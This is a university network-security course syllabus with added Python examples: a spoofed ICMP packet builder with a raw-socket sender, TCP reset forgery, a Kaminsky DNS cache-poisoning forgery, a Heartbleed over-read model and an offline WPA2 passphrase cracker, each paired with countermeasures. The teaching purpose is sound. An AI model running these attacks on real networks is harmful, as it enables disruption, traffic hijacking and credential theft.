About the Course:
This course gives an overview and a conceptual understanding of network-related security. Students delve into the technical "how to" through hands-on sessions and case studies.
To provide an overall view of network security and introduce the concept of packet analysis.
To understand the security problems in the design and implementation of the TCP, IP/ICMP and ARP protocols.
To learn the vulnerabilities in the DNS protocol and to implement and experiment with firewall rules.
To provide an overview of network management techniques and the implementation of VPNs.
To gain a deep understanding of the security aspects of wireless networks, Bluetooth and cloud computing.
At the end of this course, the students will be able to:
Sniff packets on a network and analyse them to extract information such as protocol headers and cleartext passwords.
Launch DoS and MITM attacks against various protocols, and apply countermeasures to them.
Configure firewalls on Linux machines and perform network monitoring using IDS/IPS.
Design and implement a VPN for a secure connection over the Internet.
Understand wireless network security in depth, and configure a wireless network securely.
Introduction and Packet Analysis - 10 Hours
CIA principles, attack surface and attack types, assets, vulnerabilities and threats, countermeasures, privacy, the General Data Protection Regulation (GDPR), security vs privacy, data breaches, real-life examples of cyber crime, security frameworks, job outlook. Packet Sniffing and Spoofing: Introduction; How packets are received: the Network Interface Card (NIC) and the BSD Packet Filter (BPF); Packet sniffing: receiving packets using sockets, sniffing using raw sockets, sniffing using the PCAP API, processing captured packets; Packet spoofing: sending normal packets using sockets, constructing spoofed raw ICMP and UDP packets; Sniffing and then spoofing; Scapy vs C and the hybrid approach; Endianness.
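Added example for the packet spoofing and "processing captured packets" topics above. This is not code from the course or from Du's book: it builds a spoofed IPv4/ICMP echo request byte-for-byte with the Python standard library (Scapy hides exactly these steps), verifies the checksums and endianness handling by parsing the packet back the way a sniffer would, and shows the raw-socket call that would put it on the wire. The addresses, ICMP identifier and payload are constructed for the demo.

```python
"""Added example, not code from the course or from Du's book: a spoofed
IPv4/ICMP echo request built byte-for-byte with the standard library, then
parsed back the way a sniffer processes a captured packet. Addresses, the
ICMP identifier and the payload are constructed for the demo; send_raw()
needs CAP_NET_RAW and is only called if you uncomment it in __main__."""
import socket
import struct

def inet_checksum(data: bytes) -> int:
    """RFC 1071: ones-complement sum of 16-bit big-endian words, complemented.
    Verifying a packet means the sum over header+checksum field comes out 0."""
    if len(data) % 2:
        data += b"\x00"                      # odd length: pad with a zero byte
    total = sum(struct.unpack("!%dH" % (len(data) // 2), data))
    while total >> 16:                       # fold carries back in
        total = (total & 0xFFFF) + (total >> 16)
    return (~total) & 0xFFFF

def build_ipv4(src: str, dst: str, proto: int, payload: bytes,
               ttl: int = 64, ident: int = 0x1234) -> bytes:
    """20-byte IPv4 header with no options. The '!' in the struct format
    emits network byte order whatever the host CPU's endianness is."""
    ver_ihl = (4 << 4) | 5                   # version 4, IHL = 5 words
    total_len = 20 + len(payload)
    hdr = struct.pack("!BBHHHBBH4s4s", ver_ihl, 0, total_len, ident, 0,
                      ttl, proto, 0, socket.inet_aton(src), socket.inet_aton(dst))
    hdr = hdr[:10] + struct.pack("!H", inet_checksum(hdr)) + hdr[12:]
    return hdr + payload

def build_icmp_echo(ident: int, seq: int, data: bytes) -> bytes:
    """ICMP type 8 / code 0; the checksum covers header and data."""
    hdr = struct.pack("!BBHHH", 8, 0, 0, ident, seq)
    return struct.pack("!BBHHH", 8, 0, inet_checksum(hdr + data), ident, seq) + data

def parse_ipv4(packet: bytes) -> dict:
    """Decode the fixed IPv4 header, verify its checksum, slice the payload.
    For a pcap/Ethernet capture, skip the 14-byte frame header first."""
    (ver_ihl, _tos, total_len, ident, _frag, ttl, proto, _csum,
     src, dst) = struct.unpack("!BBHHHBBH4s4s", packet[:20])
    ihl = (ver_ihl & 0x0F) * 4
    return {"version": ver_ihl >> 4, "ihl": ihl, "total_len": total_len,
            "id": ident, "ttl": ttl, "proto": proto,
            "src": socket.inet_ntoa(src), "dst": socket.inet_ntoa(dst),
            "header_ok": inet_checksum(packet[:ihl]) == 0,
            "payload": packet[ihl:total_len]}

def parse_icmp(segment: bytes) -> dict:
    typ, code, _csum, ident, seq = struct.unpack("!BBHHH", segment[:8])
    return {"type": typ, "code": code, "id": ident, "seq": seq,
            "checksum_ok": inet_checksum(segment) == 0, "data": segment[8:]}

def spoofed_ping(src: str, dst: str) -> bytes:
    """Echo request whose source address is whatever we claim it is."""
    icmp = build_icmp_echo(ident=0xBEEF, seq=1, data=b"constructed payload")
    return build_ipv4(src, dst, socket.IPPROTO_ICMP, icmp)

def send_raw(packet: bytes, dst: str) -> None:
    """IP_HDRINCL tells the kernel the buffer already carries the IP header,
    so it will not overwrite the spoofed source address."""
    with socket.socket(socket.AF_INET, socket.SOCK_RAW, socket.IPPROTO_RAW) as s:
        s.setsockopt(socket.IPPROTO_IP, socket.IP_HDRINCL, 1)
        s.sendto(packet, (dst, 0))

if __name__ == "__main__":
    pkt = spoofed_ping("10.0.2.99", "10.0.2.5")
    ip = parse_ipv4(pkt)
    print(ip["src"], "->", ip["dst"], "proto", ip["proto"], "header ok:", ip["header_ok"])
    print(parse_icmp(ip["payload"]))
    # send_raw(pkt, ip["dst"])               # requires root / CAP_NET_RAW
```

The same checksum routine serves both headers because IP and ICMP use the identical RFC 1071 algorithm; the odd-length payload exercises the padding rule, and flipping any byte of the ICMP data makes checksum_ok false, which is the check a sniffer applies before trusting a captured packet.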
OSI Protocol Attacks - 12 Hours
Attacks on the TCP protocol: Introduction, TCP overview, send and receive buffers. SYN flood attack: the TCP 3-way handshake, the SYN flooding attack, launching the attack using Netwox and C, countermeasures. TCP reset attack: resetting Telnet, SSH and video-streaming connections. TCP session hijacking attack: TCP sessions and session hijacking, launching the attack, using the hijacked TCP connection. Reverse shell: how it works, redirecting I/O to a TCP connection, creating a reverse shell. Countermeasures. Case Study 1.
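Added example for the TCP reset attack above; it is not code from the course, Netwox or Du's book. It models the sequence-number side of the attack: a sniffed segment (constructed here) gives the attacker the 4-tuple and the acknowledgement number from which a valid RST is forged, the receiver-side check shows why a blind attacker instead has to guess into the receive window, and the RFC 5961 challenge-ACK rule is included as the countermeasure. Addresses, ports and sequence numbers are constructed; no packets are sent.

```python
"""Added example, not the course's, Netwox's or Du's code: the sequence-number
side of a TCP reset attack. A sniffed segment (constructed below) gives the
attacker everything needed to forge an RST the victim will accept; the
receiver-side check shows why a blind attacker must guess into the window.
RFC 5961's challenge-ACK rule is shown as the countermeasure."""
from dataclasses import dataclass

MOD = 1 << 32                       # sequence numbers wrap at 2^32

@dataclass
class Segment:
    src: str
    sport: int
    dst: str
    dport: int
    seq: int
    ack: int
    flags: str                      # e.g. "PA" (PSH+ACK), "R" (RST)
    payload_len: int = 0

def seq_in_window(seg_seq: int, rcv_nxt: int, rcv_wnd: int) -> bool:
    """RCV.NXT <= SEG.SEQ < RCV.NXT + RCV.WND, computed modulo 2^32 so a
    window that straddles the wraparound point is handled correctly."""
    return (seg_seq - rcv_nxt) % MOD < rcv_wnd

def craft_rst(sniffed: Segment) -> Segment:
    """Forge a RST aimed at the sniffed segment's sender. That host has
    acknowledged everything up to sniffed.ack, so sniffed.ack is exactly the
    sequence number it expects next; addresses and ports are swapped so the
    RST matches the live connection's 4-tuple."""
    return Segment(src=sniffed.dst, sport=sniffed.dport,
                   dst=sniffed.src, dport=sniffed.sport,
                   seq=sniffed.ack, ack=0, flags="R")

def rst_accepted_rfc793(rst: Segment, rcv_nxt: int, rcv_wnd: int) -> bool:
    """Classic rule: any RST whose SEQ lands in the receive window tears the
    connection down, so a blind attacker needs about 2^32 / RCV.WND tries."""
    return "R" in rst.flags and seq_in_window(rst.seq, rcv_nxt, rcv_wnd)

def rst_accepted_rfc5961(rst: Segment, rcv_nxt: int, rcv_wnd: int) -> str:
    """Countermeasure: only SEQ == RCV.NXT resets immediately. An in-window
    but inexact SEQ only provokes a challenge ACK, which a spoofer never
    sees, so it cannot complete the reset."""
    if "R" not in rst.flags:
        return "ignored"
    if rst.seq == rcv_nxt:
        return "reset"
    if seq_in_window(rst.seq, rcv_nxt, rcv_wnd):
        return "challenge-ack"
    return "ignored"

def blind_guesses_needed(rcv_wnd: int) -> int:
    """Worst-case number of spoofed RSTs to land one in a window of rcv_wnd."""
    return -(-MOD // rcv_wnd)       # ceiling division

# Constructed capture: the Telnet client (10.0.2.7) just sent one keystroke
# to the server (10.0.2.5); a sniffer on the LAN sees this segment. The ack
# number sits just below 2^32 so the client's window wraps around.
SNIFFED = Segment(src="10.0.2.7", sport=40123, dst="10.0.2.5", dport=23,
                  seq=0x1000_0000, ack=0xFFFF_FFF0, flags="PA", payload_len=1)

if __name__ == "__main__":
    rst = craft_rst(SNIFFED)
    client_rcv_nxt, client_wnd = SNIFFED.ack, 65535     # client's receive state
    print("forged RST", rst.src, rst.sport, "->", rst.dst, rst.dport, hex(rst.seq))
    print("RFC 793 accepts:", rst_accepted_rfc793(rst, client_rcv_nxt, client_wnd))
    print("RFC 5961 outcome:", rst_accepted_rfc5961(rst, client_rcv_nxt, client_wnd))
    print("blind guesses for a 64 KiB window:", blind_guesses_needed(65536))
```

Resetting the other end of the connection works the same way with the roles swapped: the server expects sniffed.seq + payload_len next, so that is the sequence number a RST sent to it must carry.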
DNS & Network Security - 12 Hours
DNS Attacks: Introduction, the DNS hierarchy, zones and servers, the DNS query process, experiment setup, constructing DNS requests and responses using Scapy. DNS attacks: overview, local DNS cache poisoning attack, remote DNS cache poisoning attack (Kaminsky attack), reply forgery attacks from malicious DNS servers, DNS rebinding attack, countermeasures against DNS spoofing attacks, DoS attacks on DNS servers. Firewalls: Introduction, requirements of a firewall, firewall characteristics and access policy, types of firewall, next-generation (NG) firewalls, shortcomings, firewall location and configuration: DMZ networks, firewall topologies; building a simple firewall, Netfilter, the iptables firewall in Linux, stateful firewalls and connection tracking, application/proxy firewalls and web proxies, evading firewalls. Intrusion Detection and Prevention: intruders, intrusion detection, analysis approaches, host-based intrusion detection, network-based intrusion detection, distributed or hybrid intrusion detection, honeypots, example system: Snort, intrusion prevention systems.
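Added example for the DNS cache poisoning and Kaminsky attack topics above; it is not code from the course or from Du's book. It implements a minimal DNS message builder and parser in pure Python (the lab uses Scapy for this), then models what a resolver checks before caching a reply: the UDP port the reply arrives on, the transaction ID, the question, and whether each record is within the bailiwick of the zone that was asked. The Kaminsky forgery passes the bailiwick check by design, which is why the defence has to be source-port randomisation. Names, addresses, ports and transaction IDs are constructed; nothing is sent on the wire.

```python
"""Added example, not code from the course or from Du's book: a minimal DNS
message builder/parser in pure Python, used to show what a resolver checks
before accepting a reply and why the Kaminsky attack succeeds when only the
16-bit transaction ID is matched. Names, IPs, ports and transaction IDs are
constructed; nothing hits the wire."""
import struct
from dataclasses import dataclass, field

A, NS = 1, 2                                  # the RR types used here

def encode_name(name: str) -> bytes:
    labels = name.rstrip(".").split(".")
    return b"".join(bytes([len(l)]) + l.encode() for l in labels) + b"\x00"

def decode_name(msg: bytes, off: int):
    labels = []
    while True:
        n = msg[off]; off += 1
        if n == 0:
            break
        if n & 0xC0:                          # compression pointer (never emitted here)
            raise ValueError("compressed names not supported")
        labels.append(msg[off:off + n].decode()); off += n
    return ".".join(labels), off

def build_query(txid: int, qname: str, qtype: int = A) -> bytes:
    hdr = struct.pack("!HHHHHH", txid, 0x0100, 1, 0, 0, 0)          # RD=1
    return hdr + encode_name(qname) + struct.pack("!HH", qtype, 1)

def build_reply(txid: int, qname: str, answers=(), authority=(), additional=()) -> bytes:
    """RRs are (name, type, rdata): rdata is a dotted IPv4 for A, a host name for NS."""
    def rr(name, rtype, rdata):
        data = bytes(int(x) for x in rdata.split(".")) if rtype == A else encode_name(rdata)
        return encode_name(name) + struct.pack("!HHIH", rtype, 1, 300, len(data)) + data
    hdr = struct.pack("!HHHHHH", txid, 0x8180, 1,                    # QR=1 RD=1 RA=1
                      len(answers), len(authority), len(additional))
    body = encode_name(qname) + struct.pack("!HH", A, 1)
    for section in (answers, authority, additional):
        body += b"".join(rr(*r) for r in section)
    return hdr + body

@dataclass
class Reply:
    txid: int
    qname: str
    answers: list = field(default_factory=list)
    authority: list = field(default_factory=list)
    additional: list = field(default_factory=list)

def parse_reply(msg: bytes) -> Reply:
    txid, _flags, _qd, an, ns, ar = struct.unpack("!HHHHHH", msg[:12])
    qname, off = decode_name(msg, 12)
    off += 4                                   # skip QTYPE/QCLASS
    reply = Reply(txid, qname)
    for section, count in ((reply.answers, an), (reply.authority, ns), (reply.additional, ar)):
        for _ in range(count):
            name, off = decode_name(msg, off)
            rtype, _cls, _ttl, rdlen = struct.unpack("!HHIH", msg[off:off + 10]); off += 10
            raw = msg[off:off + rdlen]; off += rdlen
            rdata = ".".join(str(b) for b in raw) if rtype == A else decode_name(raw, 0)[0]
            section.append((name, rtype, rdata))
    return reply

@dataclass
class PendingQuery:
    txid: int
    sport: int          # UDP source port the resolver used for this query
    qname: str
    zone: str           # bailiwick: the zone whose name server was asked

def in_bailiwick(name: str, zone: str) -> bool:
    name, zone = name.rstrip(".").lower(), zone.rstrip(".").lower()
    return name == zone or name.endswith("." + zone)

def accept_reply(pending: PendingQuery, msg: bytes, dst_port: int, check_bailiwick: bool = True):
    """RRs the resolver would cache, or None if the reply is dropped. A reply
    must arrive on the query's source port, carry its transaction ID and
    repeat its question; out-of-bailiwick records are discarded."""
    if dst_port != pending.sport:
        return None
    reply = parse_reply(msg)
    if reply.txid != pending.txid or reply.qname.lower() != pending.qname.lower():
        return None
    rrs = reply.answers + reply.authority + reply.additional
    return [r for r in rrs if in_bailiwick(r[0], pending.zone)] if check_bailiwick else rrs

def kaminsky_forgery(txid: int, qname: str, zone: str, attacker_ip: str) -> bytes:
    """Forged reply to a query for a throwaway name in the zone. It answers
    nothing; the damage is the authority/glue that moves the whole zone's
    NS to the attacker, which is in bailiwick and therefore cached."""
    return build_reply(txid, qname, authority=[(zone, NS, "ns." + zone)],
                       additional=[("ns." + zone, A, attacker_ip)])

if __name__ == "__main__":
    pending = PendingQuery(txid=0x1A2B, sport=33999, qname="x7q9.example.com", zone="example.com")
    forged = kaminsky_forgery(pending.txid, pending.qname, pending.zone, "10.0.2.66")
    print("fixed port, guessed txid:", accept_reply(pending, forged, 33999))
    print("randomised port, wrong guess:", accept_reply(pending, forged, 34000))
```

With a fixed source port the attacker only has to win a 16-bit race per throwaway name, and can start a fresh race with a new random name as soon as one fails; randomising the port per query multiplies the search space by another 16 bits, which is the countermeasure the text refers to.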
Network Management and VPN - 12 Hours
Network Management: IT security management overview and risk assessment, IT security controls, plans and procedures, physical and infrastructure security, human resources security, security auditing. Virtual Private Networks: Introduction, why VPN, an analogy, and tunnelling. Overview of TLS/SSL VPNs: establishing a tunnel, forwarding and releasing IP packets, TLS/SSL VPN details; building, setting up and testing a VPN; bypassing a firewall using a VPN. The Heartbleed Bug and Attack: Introduction and the Heartbeat protocol, launching the attack, fixing the Heartbleed bug. Case Study 2.
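Added example for the Heartbleed topics above; it is not OpenSSL's code or code from the course or Du's book. It models the TLS Heartbeat handling behind CVE-2014-0160 in Python: a bytearray stands in for the process memory holding the received record, the vulnerable handler trusts the payload length declared inside the record and copies that many bytes, and the fixed handler applies the bounds check the patch added. The request, the "secret" that happens to follow it in memory, and the padding (zeros here, random in OpenSSL) are constructed for the demo.

```python
"""Added example, not OpenSSL's code: a model of the TLS Heartbeat handling
behind CVE-2014-0160 (Heartbleed). The bytearray stands in for OpenSSL's
process memory; the SECRET placed after the heartbeat record is what an
attacker reads when the declared payload length is trusted. The fixed
version applies the bounds check the patch added."""
import struct

HB_REQUEST, HB_RESPONSE = 1, 2
PADDING = 16          # RFC 6520: at least 16 bytes of padding follow the payload

def build_heartbeat_request(payload: bytes, claimed_len: int) -> bytes:
    """type(1) | payload_length(2, big-endian) | payload | padding.
    An honest client sets claimed_len == len(payload); the attack lies."""
    return struct.pack("!BH", HB_REQUEST, claimed_len) + payload + b"\x00" * PADDING

def process_heartbeat_vulnerable(memory: bytearray, rec_off: int, rec_len: int) -> bytes:
    """Pre-fix logic: take the length from the record itself and copy that
    many bytes from the payload pointer. rec_len, the length of the record
    that was actually received, is never consulted: that is the bug."""
    hbtype = memory[rec_off]
    (payload_len,) = struct.unpack("!H", memory[rec_off + 1:rec_off + 3])
    if hbtype != HB_REQUEST:
        return b""
    pl = rec_off + 3
    resp = struct.pack("!BH", HB_RESPONSE, payload_len)
    resp += bytes(memory[pl:pl + payload_len])          # the over-read
    return resp + b"\x00" * PADDING

def process_heartbeat_fixed(memory: bytearray, rec_off: int, rec_len: int) -> bytes:
    """Fixed logic: silently discard a record too short to be a heartbeat, and
    one whose declared payload plus type/length/padding exceeds the record."""
    if rec_len < 1 + 2 + PADDING:
        return b""
    hbtype = memory[rec_off]
    (payload_len,) = struct.unpack("!H", memory[rec_off + 1:rec_off + 3])
    if 1 + 2 + payload_len + PADDING > rec_len:
        return b""                                      # the Heartbleed fix
    if hbtype != HB_REQUEST:
        return b""
    pl = rec_off + 3
    resp = struct.pack("!BH", HB_RESPONSE, payload_len)
    return resp + bytes(memory[pl:pl + payload_len]) + b"\x00" * PADDING

def leaked_bytes(response: bytes, sent_payload: bytes) -> bytes:
    """Everything in the response payload beyond what the client sent."""
    (n,) = struct.unpack("!H", response[1:3])
    return response[3:3 + n][len(sent_payload):]

# Constructed "memory": the heartbeat record, followed by data left over from
# an earlier request that happens to share the buffer, then unused space.
SECRET = b"Authorization: Basic YWRtaW46aHVudGVyMg==\r\n"

def run_attack(claimed_len: int, fixed: bool) -> bytes:
    """Send a 2-byte payload that claims to be claimed_len bytes long and
    return whatever came back beyond those 2 bytes."""
    request = build_heartbeat_request(b"hi", claimed_len)
    memory = bytearray(request + SECRET + b"\x00" * 4096)
    handler = process_heartbeat_fixed if fixed else process_heartbeat_vulnerable
    resp = handler(memory, 0, len(request))
    return leaked_bytes(resp, b"hi") if resp else b""

if __name__ == "__main__":
    print("vulnerable:", run_attack(claimed_len=64, fixed=False))
    print("fixed     :", run_attack(claimed_len=64, fixed=True))
```

The real attack repeats the request with the maximum 16-bit length (64 KiB per heartbeat) against a live TLS server; the defensive check is the same inequality, comparing the attacker-controlled length against the length of the record that was actually received.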
Cloud and Wireless Security - 10 Hours
Cloud security: service and deployment models, layers, security issues in cloud computing. Bluetooth security: the Bluetooth protocol stack, the multiple security modes. Wireless communications and the 802.11 WLAN standards: Wi-Fi Protected Access (WPA), IEEE 802.1X, 802.11i/WPA2, wireless network threats. ZigBee security and wireless mesh network security.
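Added example for the 802.11i/WPA2 and wireless threats topics above; it is not code from the course or either textbook. It shows, with only the Python standard library, how a WPA2-PSK passphrase is recovered offline from a captured 4-way handshake: PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 32 bytes), PTK = PRF-512 over the two MAC addresses and two nonces, and the KCK (first 16 bytes of the PTK) keys the HMAC-SHA1-128 MIC over EAPOL message 2. The SSID, MAC addresses, nonces and EAPOL frame are constructed, and the "captured" message 2 is produced by the same derivation from a known passphrase, so the check is self-consistent rather than a real capture.

```python
"""Added example, not course or textbook code: offline dictionary attack on
WPA2-PSK from a captured 4-way handshake, standard library only. The
handshake below is constructed by running the same derivation with a known
passphrase, so it is self-consistent; no real capture is included."""
import hashlib
import hmac

def pmk_from_passphrase(passphrase: str, ssid: str) -> bytes:
    """802.11i: PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096, 32 bytes)."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)

def prf512(pmk: bytes, a_mac: bytes, s_mac: bytes, anonce: bytes, snonce: bytes) -> bytes:
    """PRF-512: concatenate HMAC-SHA1(PMK, label || 0x00 || B || i) for i = 0..3,
    B = min(AA,SPA) || max(AA,SPA) || min(ANonce,SNonce) || max(ANonce,SNonce)."""
    b = min(a_mac, s_mac) + max(a_mac, s_mac) + min(anonce, snonce) + max(anonce, snonce)
    blocks = (hmac.new(pmk, b"Pairwise key expansion" + b"\x00" + b + bytes([i]),
                       hashlib.sha1).digest() for i in range(4))
    return b"".join(blocks)[:64]

MIC_OFFSET = 81   # 4-byte 802.1X header + 77 bytes of EAPOL-Key fields before the MIC

def eapol_mic(kck: bytes, eapol_frame: bytes) -> bytes:
    """WPA2 key descriptor version 2: HMAC-SHA1 over the whole EAPOL frame
    with the 16-byte MIC field zeroed, truncated to 128 bits."""
    zeroed = eapol_frame[:MIC_OFFSET] + b"\x00" * 16 + eapol_frame[MIC_OFFSET + 16:]
    return hmac.new(kck, zeroed, hashlib.sha1).digest()[:16]

def build_eapol_msg2(snonce: bytes, mic: bytes = b"\x00" * 16, key_data: bytes = b"") -> bytes:
    """Constructed EAPOL-Key message 2 with the standard field layout:
    descriptor type, key info (MIC|Pairwise|v2), key length, replay counter,
    nonce, IV, RSC, ID, MIC, key data length, key data."""
    body = (bytes([2]) + b"\x01\x0a" + b"\x00\x10" + (1).to_bytes(8, "big") + snonce
            + b"\x00" * 16 + b"\x00" * 8 + b"\x00" * 8 + mic
            + len(key_data).to_bytes(2, "big") + key_data)
    return bytes([2, 3]) + len(body).to_bytes(2, "big") + body   # 802.1X v2, EAPOL-Key

def verify_passphrase(passphrase: str, ssid: str, ap_mac: bytes, sta_mac: bytes,
                      anonce: bytes, snonce: bytes, eapol_msg2: bytes) -> bool:
    """Derive PMK -> PTK -> KCK for a candidate and compare the MIC."""
    pmk = pmk_from_passphrase(passphrase, ssid)
    kck = prf512(pmk, ap_mac, sta_mac, anonce, snonce)[:16]
    return hmac.compare_digest(eapol_mic(kck, eapol_msg2), eapol_msg2[MIC_OFFSET:MIC_OFFSET + 16])

def crack(wordlist, ssid, ap_mac, sta_mac, anonce, snonce, eapol_msg2):
    """Return the first candidate whose derived MIC matches, else None."""
    for word in wordlist:
        if verify_passphrase(word, ssid, ap_mac, sta_mac, anonce, snonce, eapol_msg2):
            return word
    return None

# Constructed handshake parameters (what airodump-style capture would give you).
SSID = "SEEDLab"
AP_MAC = bytes.fromhex("001122334455")
STA_MAC = bytes.fromhex("66778899aabb")
ANONCE = bytes(range(32))
SNONCE = bytes(range(32, 64))

def make_capture(passphrase: str) -> bytes:
    """Message 2 as a client that knows `passphrase` would send it."""
    kck = prf512(pmk_from_passphrase(passphrase, SSID), AP_MAC, STA_MAC, ANONCE, SNONCE)[:16]
    return build_eapol_msg2(SNONCE, mic=eapol_mic(kck, build_eapol_msg2(SNONCE)))

if __name__ == "__main__":
    captured = make_capture("hunter2pass")
    print(crack(["password", "12345678", "hunter2pass"],
                SSID, AP_MAC, STA_MAC, ANONCE, SNONCE, captured))
```

Only message 2 (or 3) of the handshake plus the SSID, both MACs and both nonces are needed, which is why a passive capture of one association is enough; the 4096-iteration PBKDF2 per candidate is what makes the attack cost proportional to the wordlist, and a long random passphrase or WPA3's SAE is the countermeasure.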
1: “Computer & Internet Security: A Hands-on Approach”, Wenliang Du, 2nd Edition, 2019
2: “Computer Security: Principles and Practice”, William Stallings and Lawrie Brown, Pearson Education, 3rd Edition, 2010
Tools & Languages:
SEED Ubuntu VM, Wireshark, Snort, Netwox, Scapy
Desirable Knowledge: UE19CS253 – Computer Networks